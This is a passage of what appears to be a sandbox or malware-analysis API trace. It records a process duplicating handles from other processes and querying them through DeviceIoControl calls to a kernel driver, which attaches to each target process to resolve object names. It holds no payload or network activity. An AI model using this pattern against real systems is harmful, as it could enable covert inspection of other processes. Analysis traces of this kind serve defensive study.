(in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0182.024] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.024] PsAcquireProcessExitSynchronization () returned 0x0 [0182.024] KeStackAttachProcess (in: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0) [0182.024] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000745eb0, HandleInformation=0x0) returned 0x0 [0182.024] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.024] PsReleaseProcessExitSynchronization () returned 0x2 [0182.024] ObfDereferenceObject (Object=0xfffffa80032633a0) returned 0xc [0182.024] ObQueryNameString (in: Object=0xfffff8a000745eb0, ObjectNameInfo=0xfffffa800313f044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313f044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.024] ObfDereferenceObject (Object=0xfffff8a000745eb0) returned 0xd9 [0182.024] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.024] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.024] CloseHandle (hObject=0xbc) returned 1 [0182.024] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad0) returned 0xbc [0182.024] GetCurrentProcess () returned 0xffffffffffffffff [0182.025] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x14, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.025] CloseHandle (hObject=0xbc) returned 1 [0182.025] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.025] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2f4c70 [0182.025] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.025] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.025] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.025] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0xc0, lpOverlapped=0x0) returned 1 [0182.025] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.025] PsAcquireProcessExitSynchronization () returned 0x0 [0182.025] KeStackAttachProcess (in: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0) [0182.025] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a00399cee0, HandleInformation=0x0) returned 0x0 [0182.025] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.025] PsReleaseProcessExitSynchronization () returned 0x2 [0182.025] ObfDereferenceObject (Object=0xfffffa80032633a0) returned 0xc [0182.025] ObQueryNameString (in: Object=0xfffff8a00399cee0, ObjectNameInfo=0xfffffa8003104044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003104044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.025] ObfDereferenceObject (Object=0xfffff8a00399cee0) returned 0x2 [0182.025] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.025] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.025] CloseHandle (hObject=0xc0) returned 1 [0182.025] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa44) returned 0xc0 [0182.025] GetCurrentProcess () returned 0xffffffffffffffff [0182.025] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x58, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.025] CloseHandle (hObject=0xc0) returned 1 [0182.025] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.026] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x2f4c70 [0182.026] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.026] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.026] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.026] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0182.026] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.026] PsAcquireProcessExitSynchronization () returned 0x0 [0182.026] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0) [0182.026] ObReferenceObjectByHandle (in: Handle=0x58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80118c4250, HandleInformation=0x0) returned 0x0 [0182.026] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.026] PsReleaseProcessExitSynchronization () returned 0x2 [0182.026] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.026] ObQueryNameString (in: Object=0xfffffa80118c4250, ObjectNameInfo=0xfffffa8003178044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003178044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.026] ObfDereferenceObject (Object=0xfffffa80118c4250) returned 0x13f [0182.026] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.026] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.026] CloseHandle (hObject=0xbc) returned 1 [0182.026] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa44) returned 0xbc [0182.026] GetCurrentProcess () returned 0xffffffffffffffff [0182.026] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x54, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.026] CloseHandle (hObject=0xbc) returned 1 [0182.026] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.027] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.027] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.027] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.027] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.027] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x1a, lpOverlapped=0x0) returned 1 [0182.027] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.027] PsAcquireProcessExitSynchronization () returned 0x0 [0182.027] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0) [0182.027] ObReferenceObjectByHandle (in: Handle=0x54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003674090, HandleInformation=0x0) returned 0x0 [0182.027] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.027] PsReleaseProcessExitSynchronization () returned 0x2 [0182.027] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.027] ObQueryNameString (in: Object=0xfffffa8003674090, ObjectNameInfo=0xfffffa8003134044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003134044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.027] ObfDereferenceObject (Object=0xfffffa8003674090) returned 0x568 [0182.027] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.027] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.027] CloseHandle (hObject=0xc0) returned 1 [0182.027] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa44) returned 0xc0 [0182.027] GetCurrentProcess () returned 0xffffffffffffffff [0182.027] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x48, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0182.028] CloseHandle (hObject=0xc0) returned 1 [0182.028] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x2f4c70 [0182.028] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2f4c70, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2f4c70*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0182.028] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab5a8 | out: Process=0xfffff88002aab5a8) returned 0x0 [0182.028] PsAcquireProcessExitSynchronization () returned 0x0 [0182.028] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5c8 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5c8) [0182.028] ObReferenceObjectByHandle (in: Handle=0x48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab5b0, HandleInformation=0x0 | out: Object=0xfffff88002aab5b0*=0xfffffa8003054480, HandleInformation=0x0) returned 0x0 [0182.028] PsReleaseProcessExitSynchronization () returned 0x2 [0182.028] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.028] ZwQueryObject (in: Handle=0x48, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff88002aab5a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff88002aab5a4) returned 0xc0000004 [0182.028] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xfffff8a0021e5c30 [0182.028] ZwQueryObject (in: Handle=0x48, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a0021e5c30, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a0021e5c30, ReturnLength=0x0) returned 0x0 [0182.028] ExFreePoolWithTag (P=0xfffff8a0021e5c30, Tag=0x0) [0182.028] ObfDereferenceObject (Object=0xfffffa8003054480) returned 0x1 [0182.028] KeUnstackDetachProcess (ApcState=0xfffff88002aab5c8) [0182.028] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.028] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.028] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.029] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.029] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.029] PsAcquireProcessExitSynchronization () returned 0x0 [0182.029] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0) [0182.029] ObReferenceObjectByHandle (in: Handle=0x48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003054480, HandleInformation=0x0) returned 0x0 [0182.029] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.029] PsReleaseProcessExitSynchronization () returned 0x2 [0182.029] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.029] ObQueryNameString (in: Object=0xfffffa8003054480, ObjectNameInfo=0xfffffa8003137044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003137044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.029] ObfDereferenceObject (Object=0xfffffa8003054480) returned 0x1 [0182.029] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.029] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.029] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa44) returned 0xc0 [0182.030] GetCurrentProcess () returned 0xffffffffffffffff [0182.030] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x3c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.030] CloseHandle (hObject=0xc0) returned 1 [0182.030] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.030] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.030] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.030] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.030] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.030] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.030] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.030] PsAcquireProcessExitSynchronization () returned 0x0 [0182.030] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0) [0182.030] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800309b610, HandleInformation=0x0) returned 0x0 [0182.030] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.030] PsReleaseProcessExitSynchronization () returned 0x2 [0182.030] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.030] ObQueryNameString (in: Object=0xfffffa800309b610, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.030] ObfDereferenceObject (Object=0xfffffa800309b610) returned 0x2 [0182.030] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.031] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.031] CloseHandle (hObject=0xbc) returned 1 [0182.031] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa44) returned 0xbc [0182.031] GetCurrentProcess () returned 0xffffffffffffffff [0182.031] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.031] CloseHandle (hObject=0xbc) returned 1 [0182.031] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.031] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80) returned 0x2f4c70 [0182.031] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.031] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.031] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.031] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.031] PsAcquireProcessExitSynchronization () returned 0x0 [0182.031] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff88002aab5d0) [0182.031] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80034f23e0, HandleInformation=0x0) returned 0x0 [0182.031] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.031] PsReleaseProcessExitSynchronization () returned 0x2 [0182.031] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xf [0182.031] ObQueryNameString (in: Object=0xfffffa80034f23e0, ObjectNameInfo=0xfffffa8003139044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003139044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.031] ObfDereferenceObject (Object=0xfffffa80034f23e0) returned 0x2 [0182.031] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.031] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.032] CloseHandle (hObject=0xc0) returned 1 [0182.032] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6b8) returned 0xc0 [0182.032] GetCurrentProcess () returned 0xffffffffffffffff [0182.032] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.032] CloseHandle (hObject=0xc0) returned 1 [0182.032] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.032] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.032] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.032] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.032] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x12d538, ProcessInformationLength=0x30, ReturnLength=0x12d4b0 | out: ProcessInformation=0x12d538, ReturnLength=0x12d4b0) returned 0xc0000022 [0182.032] CloseHandle (hObject=0xbc) returned 1 [0182.032] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xbc [0182.032] GetCurrentProcess () returned 0xffffffffffffffff [0182.032] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.032] CloseHandle (hObject=0xbc) returned 1 [0182.032] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.032] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.032] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.032] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.032] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.032] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.032] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.032] PsAcquireProcessExitSynchronization () returned 0x0 [0182.033] KeStackAttachProcess (in: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0) [0182.033] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002881df0, HandleInformation=0x0) returned 0x0 [0182.033] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.033] PsReleaseProcessExitSynchronization () returned 0x2 [0182.033] ObfDereferenceObject (Object=0xfffffa80030d1b30) returned 0x22 [0182.033] ObQueryNameString (in: Object=0xfffffa8002881df0, ObjectNameInfo=0xfffffa800313a044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313a044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.033] ObfDereferenceObject (Object=0xfffffa8002881df0) returned 0x3 [0182.033] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.033] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.033] CloseHandle (hObject=0xc0) returned 1 [0182.033] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xc0 [0182.033] GetCurrentProcess () returned 0xffffffffffffffff [0182.033] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.033] CloseHandle (hObject=0xc0) returned 1 [0182.033] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.033] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.033] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.033] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.033] NtQueryInformationThread (in: ThreadHandle=0xbc, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000022 [0182.033] CloseHandle (hObject=0xbc) returned 1 [0182.033] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xbc [0182.034] GetCurrentProcess () returned 0xffffffffffffffff [0182.034] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.034] CloseHandle (hObject=0xbc) returned 1 [0182.034] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, 